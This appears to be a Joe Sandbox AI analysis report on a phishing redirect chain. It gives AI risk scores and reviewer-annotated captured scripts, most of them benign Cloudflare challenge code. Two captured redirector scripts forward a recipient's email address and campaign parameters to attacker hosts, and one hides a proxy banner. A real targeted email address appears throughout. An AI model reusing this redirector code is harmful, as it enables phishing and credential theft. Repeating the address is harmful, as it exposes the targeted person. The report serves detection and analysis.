URL: https://emailcaptain.pages.dev Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://emailcaptain.pages.dev |
URL: https://emailstats.transwill.click/dimitar/?login=... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and redirects to a suspicious domain. The script collects user email information and sends it to an untrusted domain 'emailway.aztoolls.top', which is likely used for malicious purposes such as phishing or credential theft. Additionally, the script uses a timeout to automatically redirect the user to the malicious URL after a short delay, further indicating malicious intent."
} |
// Redirector stage as captured by the sandbox: it gathers a recipient
// identifier plus campaign parameters from the current URL, rebuilds them
// into a query string for the next host, and navigates there.
// Recipient address hard-coded in a template literal.
// NOTE(review): presumably written into the page server-side from the
// `login` value of the request that served it; confirm against the HTTP capture.
var email = `yuluyev_an@rfs.ru`;
// Everything after '#' in the URL. Despite the name, nothing in this snippet
// Base64-decodes the value; it is forwarded exactly as received.
var base64email = window.location.hash.substr(1);
var href = window.location.href;
var url_string = href;
var url = new URL(url_string);
// Campaign parameters copied from the query string. searchParams.get()
// returns null for any parameter that is absent.
var request_type = url.searchParams.get("request_type");
var page = url.searchParams.get("page");
var page_bg = url.searchParams.get("page_bg");
var no_redrct = url.searchParams.get("no_redrct");
var pcnt = url.searchParams.get("pcnt");
var no_psplash = url.searchParams.get("no_psplash");
var pmax = url.searchParams.get("pmax");
var vcnt = url.searchParams.get("vcnt");
var use_cdtimr = url.searchParams.get("use_cdtimr");
// A non-empty fragment overrides the hard-coded address (`var` redeclaration
// is just an assignment here).
if (base64email){
var email = base64email;
}
// tl, hl and dir are computed but never read in this snippet.
// NOTE(review): `_x_tr_tl` / `_x_tr_hl` match the parameter names Google
// Translate's web proxy appends to proxied URLs; confirm whether the
// campaign links were delivered through that proxy.
var tl = url.searchParams.get("_x_tr_tl");
var hl = url.searchParams.get("_x_tr_hl");
var dir = href.substring(0, href.lastIndexOf('/')) + "/";
// `url` is rebound from the URL object to the next-hop string. Values are
// concatenated without encodeURIComponent, and absent parameters are emitted
// as the literal text "null", which is the shape of the landing URL recorded
// later in this report (request_type=null&page_bg=null&...). A query string in
// which most of these parameter names carry the value `null` is therefore a
// usable proxy/web-log hunting pattern for this chain.
var url = 'https://emailway.aztoolls.top/_sophosmith_oxy/?login='+email+'&page='+page+'&request_type='+request_type+'&page_bg='+page_bg+'&no_redrct='+no_redrct+'&pcnt='+pcnt+'&no_psplash='+no_psplash+'&pmax='+pmax+'&vcnt='+vcnt+'&use_cdtimr='+use_cdtimr;
// Navigates 5 ms after load. location.replace() overwrites the current
// session-history entry, so this hop is not reachable with the Back button
// and has to be recovered from network logs rather than browser history.
setTimeout(() => {window.location.replace(url);}, 5);
|
URL: https://emailstats.transwill.click/dimitar/?login=... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscation of the script's purpose raise significant security concerns. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and poses a high risk of malicious activity."
} |
// What the snippet does: appends a hidden 1x1 absolutely positioned iframe to
// document.body; once the document is no longer 'loading', c() writes an
// inline <script> into that iframe's <head>. The inline script sets
// window.__CF$cv$params and appends a second <script> whose src is the
// relative path /cdn-cgi/challenge-platform/scripts/jsd/main.js. When
// addEventListener is unavailable it chains onto document.onreadystatechange.
// The `t` value Base64-decodes to "1736772945.000000", a Unix timestamp string.
// Nothing in this snippet reads the URL, form fields or storage.
// NOTE(review): this appears to match the snippet Cloudflare injects into
// pages served through its proxy for JavaScript detections, and `r` looks like
// a Cloudflare Ray ID. If so, it shows that the host is fronted by Cloudflare
// and is not by itself evidence of malicious behaviour; confirm against the
// response headers before attributing the score above to this snippet.
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'90158add1bc17c90',t:'MTczNjc3Mjk0NS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. While it exhibits some moderate-risk indicators, such as external data transmission and fallback domains, the overall behavior is consistent with its intended purpose of verifying user interactions. Further review may be needed to ensure there are no additional hidden behaviors, but the script does not appear to be inherently malicious."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'ar2zd',
chlApiSitekey: '0x4AAAAAAAeT97zv7RuMp8kB',
chlApiMode: 'non-interactive',
chlApiSize: 'normal',
chlApiRcV: '2nc32qyTU8Z1eHCVFB7c62utFEiXmxrCQjQGZ6_fIqE-1736772949-1.3.1.1-d0yVxIWjJPxHNdpqYaDbOtopN63vnV0S0C1nV3IKJyQ',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:72000,
cK:[],
cType: 'chl_api_ni',
cRay: '90158af45ec44402',
cH: 'NVPHbFOmhL5DkZBkoPHc8bvzHsh_qbPuKoQU18O6GiU-1736772949-1.1.1.1-_Rt88Rqqxur_T.V.F0R6Xx7HUGKoHUahTjd1hNZcOx9knQOYT3GVAN7TCou7Ab.w',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'DJSSkwM_DnUU_fNuqCQgQS1GIeo7Z4hyUxRfTuGe.mc-1736772949-1.1.1.1-QS1cGLwbXllYL1g0ezTw0X6rvTonbccC.f0PO83CouGz2kkR6cT3ywY8DN4V89Q2RO9UGt_.F56JLzkbNxTIvRVRJ2c4Hfej44YZ1.ADd3mgPnsZQ3AYUqBtjnT82VyDu.xDQnefvrAvANZoTqthO5qlOwa5onyU8Xri..nQyKjc2o92cWeb301M0Gd860IppbFbbOfcJyUGBUF9gQcl4FicWJ75KDGm_5KjswOLM5nXMt6NWhJ4oFr4euVEa5oAr8uazdR2MS_yxKOSF353StWkXETUqtY4TiVTKuZ9FDzrvBEFz9xjBqeJIdF2MDKuxmff8CuiPThkQka7WTErsr4GGCs2qItnCKymNCJuYXi_Y7m.QlKJahcOsqPyYQXXYeBamkyoNZkaSxIFa739ll84GkvepbTi2q8AWIJQAiUVQo8PirkHQduPFN47hl1wteSAAFvXMu..XhrPRvI1pm1eO31GEL2IhpIf.5WPWBAlJNc3MIYxrCZ0ue.ln.EAYjlU10Ve5_4_2i5N_Nt1Rh_5I0A_a91eUKtvzc.Fwtoqpo9EBTrIReYYhZiZ3vq5HIaurRkqCX8WrgxeLZIVzBiGRBm8oRbRJPByqHL3_eNxH47KxfuMCpcGr9qbe75CkyKlU392L6ygR9XA_AvabmUVoRzcHVBLcWdPicJoXK..5JlmPNFrqZPD6nZcfGNYe28zhukGdJpJGQDIuh1RAMMexDU02.3fpEeLUXGWRZR.AixxEEwAbhEGuGEYHki3q1fNzXBu8X939sVL7bwk.GOzaEiEPV_WsMlv1lN41HQLTi1PuGHV6Y86pNTB.veW1GGrlSa7VXoQ_gF_iaj15KY9QVpK2xdC99s.5wla6qk5UGO80dnhwk1JqAtAXqemuAormKBK8eALJfUDtNT9LJXEuoZ2PVCBkKgc7IrO2nW9c5LMih7vajmmnjKUVgGtHljtXMRocwoz6XUn5TJwiQ_MYEXEsEN35j3HbTcMjZirZu8.uRlAv.G67DGnys9efeWAZky6BTvecYcId7QsAj.EI36SWFB9UEp.7ujhNxwCMnSDmLtcpDZaAvDBYAIW_4DVr_khnDYVZ9XCL62ppttNK4lc5g2PUKqbYgyGm_dI1fCns5lRSt0o0gg8HiruUDmSAOWfaDljU.ORqNJ6uMpSQ7LtCQdyt_wydAIx4lMAqQ59p5X1CJtD72sHEub14Q.7nE8hIxw23FIAyzL9SOXE518zSYEgufpaDxVHi6yfA41QKPLdnXlEj.Q2Vpr6eZHkIHkfMqqBhqtd16qbOFt6Y07YwlEhL9phutR285ltuRNbzJ_sdHVRIhGQYyXv7mTadHPO2.VVbhbb7POxdYZIjAUt9NIYpUDIDfVj_ZEo6BHs1OLEPecws2OhiJTCGYZM4seW67cKMo6WgdUafCc5_8njV0bLD5ZlF0oN6hxTkY1AhBUi4EEJyIBecTRZ3HZ8RsRei23J.m0moPTuurcLy2PnyIBhJv9ezFP_LdQo9_M1VcpplYjJclfvSPRuR2BYjlzpU5_8tPbGzn7HJZBI7jeR.tzBPevafG_HyIw',
cITimeS: '1736772949',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'ar2zd',
nextRcV: '2nc32qyTU8Z1eHCVFB7c62utFEiXmxrCQjQGZ6_fIqE-1736772949-1.3.1.1-d0yVxIWjJPxHNdpqYaDbOtopN63vnV0S0C1nV3IKJyQ',
event: 'reloadRequest',
}, "*");
|
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?log... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and indicative of a potential malicious attack."
} |
// Same structure as the hidden-iframe loader captured on the previous hop;
// only the `r` and `t` values differ. It appends a hidden 1x1 iframe to
// document.body and, once the document is no longer 'loading', injects an
// inline <script> into the iframe that sets window.__CF$cv$params and loads
// the relative path /cdn-cgi/challenge-platform/scripts/jsd/main.js.
// The `t` value Base64-decodes to "1736772947.000000", a Unix timestamp string.
// Nothing in this snippet reads the URL, form fields or storage.
// NOTE(review): appears to be the snippet Cloudflare injects for JavaScript
// detections on proxied sites, with `r` resembling a Ray ID. If confirmed, it
// indicates Cloudflare fronting for this host rather than attacker-authored
// code, and it should not be used as a malicious indicator on its own.
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'90158ae61e8441b4',t:'MTczNjc3Mjk0Ny4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
URL: https://emailcaptain.pages.dev/dimitar?login=eXVsd... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, redirects to a suspicious domain, and the use of obfuscated parameters. The script extracts sensitive information (email address) from the URL and sends it to a third-party domain ('emailstats.transwill.click'). Additionally, it redirects the user to this domain after a short delay, which is a common tactic used in malicious scripts. The presence of obfuscated parameters further increases the suspicion of malicious intent."
} |
// First-hop redirector as captured by the sandbox: takes the recipient
// identifier from the URL fragment or the `login` query parameter, stores it
// in localStorage, and forwards it with the campaign parameters to the next host.
// Everything after '#' in the URL. Nothing in this snippet decodes it.
var base64email = window.location.hash.substr(1);
var href = window.location.href;
var url_string = href;
var url = new URL(url_string);
// `login` is the second source of the identifier; the sandboxed URL carried a
// value starting `eXVsd`, and it is forwarded here without being decoded.
var base64login = url.searchParams.get("login");
// Campaign parameters copied from the query string. searchParams.get()
// returns null for any parameter that is absent.
var request_type = url.searchParams.get("request_type");
var page = url.searchParams.get("page");
var page_bg = url.searchParams.get("page_bg");
var no_redrct = url.searchParams.get("no_redrct");
var pcnt = url.searchParams.get("pcnt");
var no_psplash = url.searchParams.get("no_psplash");
var pmax = url.searchParams.get("pmax");
var vcnt = url.searchParams.get("vcnt");
var use_cdtimr = url.searchParams.get("use_cdtimr");
// Precedence: fragment first, then `login`, else empty string. The three
// `var email` declarations are hoisted to a single variable.
if (base64email){
var email = base64email;
} else if(base64login){
var email = base64login;
}else{
var email = "";
}
// Persists the identifier under the key "email" in this origin's
// localStorage, so it survives the redirect and is a recoverable artefact in
// the browser profile of an affected user.
// `hash` is assigned without a declaration (an implicit global in non-strict
// code) and is not read anywhere in this snippet.
if(base64email || base64login){
localStorage.setItem("email", email);
hash = '#';
}
// tl, hl and dir are computed but never read in this snippet.
// NOTE(review): `_x_tr_tl` / `_x_tr_hl` match the parameter names Google
// Translate's web proxy appends to proxied URLs; confirm whether the
// campaign links were delivered through that proxy.
var tl = url.searchParams.get("_x_tr_tl");
var hl = url.searchParams.get("_x_tr_hl");
var dir = href.substring(0, href.lastIndexOf('/')) + "/";
// `url` is rebound from the URL object to the next-hop string. Values are
// concatenated without encodeURIComponent, and absent parameters are emitted
// as the literal text "null", which gives the outgoing request a distinctive
// shape for proxy and web-log searches.
var url = 'https://emailstats.transwill.click/dimitar/?login='+email+'&page='+page+'&request_type='+request_type+'&page_bg='+page_bg+'&no_redrct='+no_redrct+'&pcnt='+pcnt+'&no_psplash='+no_psplash+'&pmax='+pmax+'&vcnt='+vcnt+'&use_cdtimr='+use_cdtimr;
// Navigates 5 ms after load. location.replace() overwrites the current
// session-history entry, so this hop is not reachable with the Back button
// and has to be recovered from network logs rather than browser history.
setTimeout(() => {window.location.replace(url);}, 5);
|
URL: https://emailcaptain.pages.dev/dimitar?login=eXVsd... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a simple DOM manipulation task, hiding an element on the page after a 10-millisecond delay. This behavior is common for web development and does not exhibit any high-risk indicators. The code uses standard DOM APIs and does not engage in dynamic code execution, data exfiltration, or suspicious redirects. While the aggressive DOM manipulation could be considered a moderate-risk indicator, the overall context suggests this is likely a legitimate use case, such as hiding a loading or placeholder element. Therefore, the risk score is assessed as low."
} |
// Once the DOM is ready, waits 10 ms and then hides the element whose id is
// 'gt-nvframe'. getElementById returns null when no such element exists, in
// which case the style assignment below throws a TypeError.
// NOTE(review): 'gt-nvframe' looks like the id of the banner frame Google
// Translate adds to pages served through its web proxy. Hiding it would remove
// the visible cue that the page is being proxied, which is relevant context
// for the low score assigned above; confirm against the captured DOM.
$(document).ready(function() {
setTimeout(() => {
var box = document.getElementById('gt-nvframe');
// display:none takes the element out of layout (it remains in the DOM)
box.style.display = 'none';
// Alternative left disabled by the author: visibility:hidden hides the
// element but keeps its space on the page
// box.style.visibility = 'hidden';
}, 10); // 10 ms delay
});
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script sets up various configuration options and translations for the Cloudflare challenge, but does not contain any high-risk indicators like dynamic code execution, data exfiltration, or malicious redirects. The script's purpose is to provide a user-friendly challenge experience for website visitors, which is a legitimate security practice. While the script uses some legacy APIs like XDomainRequest, these pose minor risks and are not inherently malicious. Overall, this script is likely benign and does not demonstrate any suspicious or malicious behavior."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_overrun_description":"Stuck%20here%3F","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_expired":"Expired","turnstile_footer_privacy":"Privacy","turnstile_footer_terms":"Terms","testing_only":"Testing%20only.","turnstile_refresh":"Refresh","turnstile_feedback_description":"Send%20Feedback","turnstile_verifying":"Verifying...","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","human_button_text":"Verify%20you%20are%20human","turnstile_failure":"Error","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_report":"Having%20trouble%3F","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-c
hallenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_timeout":"Timed%20out","turnstile_success":"Success%21","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eU,f1,f2,f5,f8,fa,fb,fc,fo,fA,fG,fH,fI,fS,g3,g7,ga,gb,gB,gC,gG,gH,g8,g9){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(595))/1*(parseInt(gI(725))/2)+-parseInt(gI(1338))/3*(-parseInt(gI(1353))/4)+-parseInt(gI(587))/5+parseInt(gI(914))/6+-parseInt(gI(487))/7*(-parseInt(gI(237))/8)+parseInt(gI(153))/9+parseInt(gI(177))/10*(-parseInt(gI(222))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,827939),eM=this||self,eN=eM[gJ(578)],eM[gJ(518)]=![],eM[gJ(996)]=function(h1){if(h1=gJ,eM[h1(518)])return;eM[h1(518)]=!![]},eU=0,eN[gJ(503)]===gJ(1501)?eN[gJ(1450)](gJ(1263),function(){setTimeout(eX,0)}):setTimeout(eX,0),eM[gJ(159)]=function(c,hj,e){e=(hj=gJ,{'bBGiN':function(g,h){return g(h)}});try{return e[hj(363)](f0,c)}catch(g){return eY(eZ(c))}},f1=function(hk,d,e,f,g){return hk=gJ,d={'LqNiW':function(h,i){return h-i},'TfETe':function(h,i){return h^i},'LrpXP':function(h,i){return i^h},'kQNwT':function(h,i){return h+i},'zcRyC':function(h,i){return h-i},'LTzWX':function(h,i){return h^i},'IRZoW':function(h,i){return h===i},'vuAqf':function(h,i){return i^h},'dJTkC':function(h,i){return h^i},'jmDTo':function(h,i){return h===i},'wfEbw':function(h,i){return i^h},'oOBSE':function(h,i){return h/ i},'CBBXF':function(h,i){return h^i},'gfeKy':function(h,i){return h%i},'SGmwU':function(h,i){return h===i},'FDmzj':function(h,i){return i^h},'QxTkj':function(h,i){return h^i},'wIOLo':function(h,i){return i^h},'KkoZv':function(h,i){return h^i},'XRPpc':function(h,i){return i^h},'rovIV':function(h,i){return i^h},'vFSRA':function(h,i){return i^h},'FrCGr':function(h,i){return 
h>>i},'xGbOA':function(h |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles communication between the challenge widget and the parent window, which is a legitimate use case. While the script uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of a Cloudflare challenge, with no clear indicators of malicious intent."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'ar2zd',
chlApiSitekey: '0x4AAAAAAAeT97zv7RuMp8kB',
chlApiMode: 'non-interactive',
chlApiSize: 'normal',
chlApiRcV: '2nc32qyTU8Z1eHCVFB7c62utFEiXmxrCQjQGZ6_fIqE-1736772949-1.3.1.1-d0yVxIWjJPxHNdpqYaDbOtopN63vnV0S0C1nV3IKJyQ',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:72000,
cK:[],
cType: 'chl_api_ni',
cRay: '90158af45ec44402',
cH: 'NVPHbFOmhL5DkZBkoPHc8bvzHsh_qbPuKoQU18O6GiU-1736772949-1.1.1.1-_Rt88Rqqxur_T.V.F0R6Xx7HUGKoHUahTjd1hNZcOx9knQOYT3GVAN7TCou7Ab.w',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'DJSSkwM_DnUU_fNuqCQgQS1GIeo7Z4hyUxRfTuGe.mc-1736772949-1.1.1.1-QS1cGLwbXllYL1g0ezTw0X6rvTonbccC.f0PO83CouGz2kkR6cT3ywY8DN4V89Q2RO9UGt_.F56JLzkbNxTIvRVRJ2c4Hfej44YZ1.ADd3mgPnsZQ3AYUqBtjnT82VyDu.xDQnefvrAvANZoTqthO5qlOwa5onyU8Xri..nQyKjc2o92cWeb301M0Gd860IppbFbbOfcJyUGBUF9gQcl4FicWJ75KDGm_5KjswOLM5nXMt6NWhJ4oFr4euVEa5oAr8uazdR2MS_yxKOSF353StWkXETUqtY4TiVTKuZ9FDzrvBEFz9xjBqeJIdF2MDKuxmff8CuiPThkQka7WTErsr4GGCs2qItnCKymNCJuYXi_Y7m.QlKJahcOsqPyYQXXYeBamkyoNZkaSxIFa739ll84GkvepbTi2q8AWIJQAiUVQo8PirkHQduPFN47hl1wteSAAFvXMu..XhrPRvI1pm1eO31GEL2IhpIf.5WPWBAlJNc3MIYxrCZ0ue.ln.EAYjlU10Ve5_4_2i5N_Nt1Rh_5I0A_a91eUKtvzc.Fwtoqpo9EBTrIReYYhZiZ3vq5HIaurRkqCX8WrgxeLZIVzBiGRBm8oRbRJPByqHL3_eNxH47KxfuMCpcGr9qbe75CkyKlU392L6ygR9XA_AvabmUVoRzcHVBLcWdPicJoXK..5JlmPNFrqZPD6nZcfGNYe28zhukGdJpJGQDIuh1RAMMexDU02.3fpEeLUXGWRZR.AixxEEwAbhEGuGEYHki3q1fNzXBu8X939sVL7bwk.GOzaEiEPV_WsMlv1lN41HQLTi1PuGHV6Y86pNTB.veW1GGrlSa7VXoQ_gF_iaj15KY9QVpK2xdC99s.5wla6qk5UGO80dnhwk1JqAtAXqemuAormKBK8eALJfUDtNT9LJXEuoZ2PVCBkKgc7IrO2nW9c5LMih7vajmmnjKUVgGtHljtXMRocwoz6XUn5TJwiQ_MYEXEsEN35j3HbTcMjZirZu8.uRlAv.G67DGnys9efeWAZky6BTvecYcId7QsAj.EI36SWFB9UEp.7ujhNxwCMnSDmLtcpDZaAvDBYAIW_4DVr_khnDYVZ9XCL62ppttNK4lc5g2PUKqbYgyGm_dI1fCns5lRSt0o0gg8HiruUDmSAOWfaDljU.ORqNJ6uMpSQ7LtCQdyt_wydAIx4lMAqQ59p5X1CJtD72sHEub14Q.7nE8hIxw23FIAyzL9SOXE518zSYEgufpaDxVHi6yfA41QKPLdnXlEj.Q2Vpr6eZHkIHkfMqqBhqtd16qbOFt6Y07YwlEhL9phutR285ltuRNbzJ_sdHVRIhGQYyXv7mTadHPO2.VVbhbb7POxdYZIjAUt9NIYpUDIDfVj_ZEo6BHs1OLEPecws2OhiJTCGYZM4seW67cKMo6WgdUafCc5_8njV0bLD5ZlF0oN6hxTkY1AhBUi4EEJyIBecTRZ3HZ8RsRei23J.m0moPTuurcLy2PnyIBhJv9ezFP_LdQo9_M1VcpplYjJclfvSPRuR2BYjlzpU5_8tPbGzn7HJZBI7jeR.tzBPevafG_HyIw',
cITimeS: '1736772949',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'ar2zd',
nextRcV: '2nc32qyTU8Z1eHCVFB7c62utFEiXmxrCQjQGZ6_fIqE-1736772949-1.3.1.1-d0yVxIWjJPxHNdpqYaDbOtopN63vnV0S0C1nV3IKJyQ',
event: 'reloadRequest',
}, "*");
}
}
};
// Message handler for the challenge widget frame. It answers a 'meow' probe
// with a 'food' reply carrying the same sequence number.
// NOTE(review): presumably registered for window 'message' events in the part
// of the script that is cut off after this block; confirm.
var handler = function(event) {
var e = event.data;
// Accepts the message only when the payload names the 'cloudflare-challenge'
// source, the 'meow' event and this widget's id. The visible code checks
// payload fields only; it does not inspect event.origin.
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
// Reply goes to the parent window with targetOrigin '*', i.e. to whatever
// page embeds the widget; the payload holds the widget id and echoed seq.
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
wi |
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI |
{
"risk_score": 1,
"reasoning": "The script contains no high-risk or moderate-risk indicators. It appears to be a utility script with no signs of malicious behavior, such as dynamic code execution or data exfiltration. The code is not obfuscated, and there are no interactions with external domains. The script seems to be handling internal operations, likely related to error handling or state management, which aligns with low-risk indicators."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return 